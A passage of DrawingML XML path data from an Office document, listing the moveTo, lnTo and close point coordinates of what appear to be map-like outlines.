                  <a:pt x="6545" y="5442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6566" y="5390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6577" y="5339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6566" y="5317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6566" y="5246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6577" y="5275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6587" y="5288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6587" y="5317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6643" y="5214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6669" y="5121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6655" y="5111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6681" y="5070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6674" y="5092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6711" y="5092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6794" y="5050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6784" y="5018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6695" y="5050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6747" y="5009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6784" y="4999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6810" y="4999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6851" y="4980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6877" y="4980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6919" y="4957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6928" y="4916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6919" y="4887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6919" y="4938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6893" y="4928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6888" y="4864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6898" y="4794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6907" y="4761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6954" y="4681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7022" y="4640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7084" y="4588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7152" y="4527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7152" y="4486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213" y="4466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7303" y="4466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7188" y="4579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7173" y="4691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213" y="4701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7291" y="4598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7354" y="4547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7484" y="4466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7567" y="4383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7536" y="4332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7550" y="4239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7473" y="4383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7380" y="4402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7317" y="4341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7317" y="4239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7322" y="4094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7390" y="4004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7354" y="3940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7270" y="3953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7141" y="4065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7022" y="4239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6975" y="4261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7058" y="4136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7167" y="3963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7244" y="3902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7307" y="3809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7364" y="3799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7442" y="3799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7550" y="3828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7644" y="3809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7727" y="3696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7821" y="3655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7866" y="3603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7913" y="3561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7934" y="3407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7924" y="3366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7882" y="3347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7882" y="3234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7861" y="3193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7784" y="3160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7753" y="3090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7701" y="3016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7743" y="2936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7717" y="2782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7691" y="2628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7680" y="2516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7633" y="2567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7555" y="2708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7468" y="2782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7447" y="2698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7406" y="2689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7432" y="2525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7463" y="2422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7380" y="2413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7374" y="2361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7338" y="2288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7303" y="2246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7256" y="2288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7209" y="2268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7141" y="2236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7100" y="2268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7058" y="2464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7048" y="2576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6950" y="2698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6985" y="2801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6992" y="2904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6971" y="2987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6919" y="3080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6841" y="3170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6742" y="3234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6763" y="3295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6737" y="3501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6674" y="3632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6629" y="3674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6577" y="3552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6577" y="3407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6596" y="3286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6634" y="3170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6582" y="3151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6504" y="3151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6462" y="3090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6410" y="3058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6396" y="2997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6358" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6281" y="2894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6203" y="2926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6214" y="2824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6229" y="2708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6167" y="2689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6219" y="2535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6271" y="2442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6370" y="2297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6462" y="2207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6525" y="2185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6556" y="2114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6613" y="2063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6681" y="2053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6763" y="1970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6794" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6877" y="1816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6907" y="1755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6945" y="1797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7011" y="1774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7131" y="1694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7157" y="1630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7147" y="1569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7204" y="1508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7218" y="1457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7183" y="1396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7126" y="1386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7063" y="1373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7011" y="1498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6945" y="1601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6867" y="1681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6851" y="1601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6898" y="1518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6877" y="1447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6778" y="1527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6825" y="1415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6752" y="1396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6815" y="1335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6815" y="1210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6794" y="1158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6747" y="1139"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3105" y="1181"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3093" y="1190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3027" y="1261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3088" y="1261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3157" y="1232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3171" y="1210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3140" y="1181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3105" y="1181"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18507" y="1190"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18490" y="1232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18533" y="1271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18575" y="1261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18507" y="1190"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6525" y="1344"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6473" y="1396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6415" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6452" y="1476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6493" y="1466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6540" y="1498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6587" y="1457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6577" y="1415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6571" y="1396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6556" y="1373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6525" y="1344"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2855" y="1476"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2497" y="1938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2561" y="1899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2580" y="1835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2658" y="1806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2612" y="1858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2606" y="1899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2674" y="1877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2705" y="1899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2679" y="1951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2716" y="1989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2721" y="2031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2761" y="2031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2799" y="2012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2881" y="1887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2964" y="1877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3046" y="1826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3037" y="1713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2928" y="1694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2876" y="1784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2865" y="1755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2923" y="1681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2891" y="1569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2855" y="1476"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7421" y="1559"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7380" y="1569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7338" y="1630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7328" y="1694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7380" y="1681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7421" y="1652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7432" y="1643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7447" y="1591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7421" y="1559"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10064" y="1765"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9986" y="1826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9934" y="1784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9857" y="1858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9795" y="1774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9722" y="1797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687" y="1867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9779" y="1899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9779" y="1928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9696" y="1960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9790" y="2012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9738" y="2063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9868" y="2105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9925" y="2124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9965" y="2105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10106" y="2021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10172" y="1928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10127" y="1848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10142" y="1765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10064" y="1765"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6872" y="1858"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6815" y="1960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6778" y="2063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6716" y="2114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6784" y="2105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6773" y="2175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6862" y="2114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6928" y="2053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6940" y="2105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7001" y="2134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7058" y="2092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7037" y="2053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7001" y="2063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7011" y="2012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6975" y="1970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6933" y="1928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6919" y="1899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6893" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6898" y="1867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6872" y="1858"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2778" y="2092"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2747" y="2134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2752" y="2143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2794" y="2134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2799" y="2166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2820" y="2185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2871" y="2166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2881" y="2143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2846" y="2134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2829" y="2105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2794" y="2114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2778" y="2092"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6877" y="2195"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6825" y="2246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6825" y="2288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6856" y="2288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6933" y="2217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6940" y="2195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6877" y="2195"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7011" y="2259"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6985" y="2297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6980" y="2310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6980" y="2339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6996" y="2349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7037" y="2288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7032" y="2259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7011" y="2259"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2756" y="2503"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2700" y="2525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2705" y="2567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2726" y="2586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2768" y="2567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2794" y="2516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2756" y="2503"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10556" y="2730"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10516" y="2833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10495" y="2955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10516" y="3029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10521" y="3151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10547" y="3090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10561" y="3119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10542" y="3183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10556" y="3212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10613" y="3234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10650" y="3314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10639" y="3398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10568" y="3375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10556" y="3468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10582" y="3542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10525" y="3581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10542" y="3632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10624" y="3655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10577" y="3674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10495" y="3818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10525" y="3837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10561" y="3799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10608" y="3809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10645" y="3748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10671" y="3776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10759" y="3735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10832" y="3735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10879" y="3664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10857" y="3603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10883" y="3561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10888" y="3478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10827" y="3459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10811" y="3407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10780" y="3253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10743" y="3234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10697" y="3067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10645" y="3058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10691" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10702" y="2843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10650" y="2843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10598" y="2862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10655" y="2730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10594" y="2740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10556" y="2730"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3228" y="2811"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3192" y="2833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3124" y="2875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3098" y="2936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110" y="2965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3182" y="2913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3260" y="2852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3260" y="2824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3228" y="2811"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10457" y="3160"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10417" y="3170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10375" y="3234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10302" y="3337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10328" y="3459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10283" y="3603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10354" y="3622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10448" y="3542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10490" y="3427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10483" y="3337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10509" y="3244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10457" y="3160"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4000" y="3295"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3979" y="3337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3970" y="3398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3974" y="3427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3970" y="3491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979" y="3552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4000" y="3552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3995" y="3449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4073" y="3305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4021" y="3314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4000" y="3295"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7892" y="3622"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7840" y="3664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7795" y="3748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7706" y="3953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7649" y="4033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7665" y="4065"/>
                </a:lnTo>
